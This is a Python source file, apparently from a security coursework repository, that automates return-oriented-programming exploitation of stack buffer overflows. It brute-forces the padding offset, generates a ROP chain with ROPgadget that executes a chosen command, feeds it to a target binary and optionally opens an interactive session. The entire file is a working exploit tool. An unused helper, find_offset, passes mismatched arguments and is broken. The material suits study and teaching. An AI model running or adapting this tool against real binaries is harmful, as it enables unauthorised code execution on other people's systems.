security-cw/autoRop.py

162 lines
5.7 KiB
Python
Raw Normal View History

import argparse
import atexit
import math
import os
import subprocess
import sys
import json
from contextlib import redirect_stderr
from pwnlib.context import context
2020-11-25 15:16:52 +00:00
from pwnlib.elf.corefile import Coredump
2020-12-05 16:09:33 +00:00
from pwnlib.tubes.process import process, signal, PTY
from pwnlib import term
2020-11-25 15:16:52 +00:00
from pwnlib.util.cyclic import cyclic, cyclic_find
from pwnlib.util.packing import pack
from pwnlib import atexit as pwnlibexit
# pwnlib has its own version of atexit to do stuff when the program exits, but uses sys.exitfunc
# to do so... unfortunately this was deprecated in python3 so it no longer works!
# either we use python2 or just re-register the pwnlib functions as follows
# why does everything use python2 :(
atexit.register(pwnlibexit._run_handlers)
# delete the corefiles on exit
context.update(delete_corefiles=True)
2020-11-25 15:16:52 +00:00
print(r'''
_ ___ _.--. ___ _____ ______ _____ ______ ______
\`.|\..----...-'` `-._.-'_.-'` / _ \ / ____| /\ |____ / ____| /\ | ____| ____|
/ ' ` , __.--' | | | |_ _| | / \ / / | / \ | |__ | |__
)/' _/ \ `-_, / | | | \ \/ / | / /\ \ / /| | / /\ \ | __| | __|
`-'" `"\_ ,_.-;_.-\_ ', | |_| |> <| |____ / ____ \ / / | |____ / ____ \| | | |____
_.-'_./ {_.' ; / \___//_/\_\\_____/_/ \_\/_/ \_____/_/ \_\_| |______|
{_.-``-' {_/
''')
2020-11-25 15:16:52 +00:00
arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
arg_parser.add_argument("--rop_file", metavar="rop_file", default="rop.txt", type=str, help="The name of the generated ROP input file")
arg_parser.add_argument("--rop_exec_file", metavar="rop_exec", default="rop_exec.json", type=str, help="The path to the file containing the command for the ROP to run")
arg_parser.add_argument("--min_payload", metavar="min", default=32, type=int, help="The minimum payload length to try")
arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int, help="The maximum payload length to try")
2020-12-05 16:09:33 +00:00
arg_parser.add_argument("--input_method", metavar="method", choices=['arg', 'file', 'stdin'], default='arg', help="Method of passing the payload to the target binary")
arg_parser.add_argument("--run", action="store_true", default=False, help="Automatically run the ROP on the executable")
args = arg_parser.parse_args()
exec_file = args.exec_file
rop_file = args.rop_file
rop_exec_file = args.rop_exec_file
min_payload = args.min_payload
max_payload = args.max_payload
run = args.run
2020-12-05 16:09:33 +00:00
input_method = args.input_method
2020-12-05 17:26:35 +00:00
def run_program(payload: str, **kwargs):
2020-12-05 16:09:33 +00:00
p = None
2020-12-05 17:26:35 +00:00
if input_method == 'arg':
2020-12-05 16:09:33 +00:00
p = process([f'./{exec_file}', payload], **kwargs)
2020-12-05 17:26:35 +00:00
elif input_method == 'file':
2020-12-05 16:09:33 +00:00
with open('/tmp/input.txt', 'wb') as f:
f.write(payload)
f.flush()
p = process([f'./{exec_file}', '/tmp/input.txt'], **kwargs)
2020-12-05 17:26:35 +00:00
elif input_method == 'stdin':
2020-12-05 16:09:33 +00:00
p = process([f'./{exec_file}'], **kwargs)
p.send(payload)
return p
2020-12-05 17:26:35 +00:00
def find_offset_inc(low: int, high: int):
for i in range(low, high + 1):
print(f" ├─[🤔] Trying payload {i}...")
subprocess.run(
[
"ROPgadget",
"--binary", exec_file,
"--ropchain",
"--silent",
"--paddingLen", str(i),
"--ropFile", rop_file,
"--execFile", 'rop_exec_default.json',
],
stdout = subprocess.PIPE
)
with open(rop_file, 'rb') as f:
p = run_program(f.read())
if b'[ Successful ROP! ]' in p.readall():
print(f" └─[😳] Found offset at {i}!\n")
return i
return -1
def find_offset(exec_file: str, min_payload: int, max_payload: int):
print("[ Find Offset Length ]")
payload_size = min_payload
while payload_size <= max_payload:
print(f" ├─[🤔] Trying payload {payload_size}...")
2020-12-05 16:09:33 +00:00
payload = cyclic(payload_size)
proc = run_program(exec_file, payload, input_method, alarm=2)
exit_code = proc.poll(block=True)
2020-12-05 16:09:33 +00:00
x = proc.readall()
print(x)
if exit_code != 0:
# ignore the warnings returned by pwnlib, if finding corefile fails then core is None
with open("/dev/null", "w") as f, redirect_stderr(f):
core = proc.corefile
if core is not None and pack(core.eip) in payload:
offset = cyclic_find(core.eip)
print(f" └─[😳] Found offset at {offset}!\n")
return offset
2020-11-25 15:16:52 +00:00
payload_size *= 2
2020-11-25 15:16:52 +00:00
return -1
2020-12-05 17:26:35 +00:00
offset = find_offset_inc(min_payload, max_payload)
if offset == -1:
print(f" └─[😞] Failed to find offset. Try increasing the payload bounds and ensuring core dumps are enabled!")
sys.exit(0)
2020-11-25 15:16:52 +00:00
print("[ Generate ROP ]")
print(f" ├─[🤔] Running ROPgadget with offset {offset}...")
result = subprocess.run(
[
"ROPgadget",
"--binary", exec_file,
"--ropchain",
"--silent",
"--paddingLen", str(offset),
"--ropFile", rop_file,
"--execFile", rop_exec_file,
],
stdout = subprocess.PIPE
)
with open("log/ropgadget.log", "wb") as f:
f.write(result.stdout)
print(f" └─[🤩] All done! The ROP input is saved to {rop_file}!")
2020-11-25 15:16:52 +00:00
if run:
2020-12-05 16:09:33 +00:00
atexit.unregister(pwnlibexit._run_handlers)
2020-11-28 15:31:36 +00:00
pwnlibexit._run_handlers()
print()
print(f"[ Run Program : ./{exec_file} {rop_file} ]")
2020-12-05 16:09:33 +00:00
with open(rop_file, 'rb') as f:
term.init()
2020-12-05 17:26:35 +00:00
p = run_program(f.read())
2020-12-05 16:09:33 +00:00
p.interactive()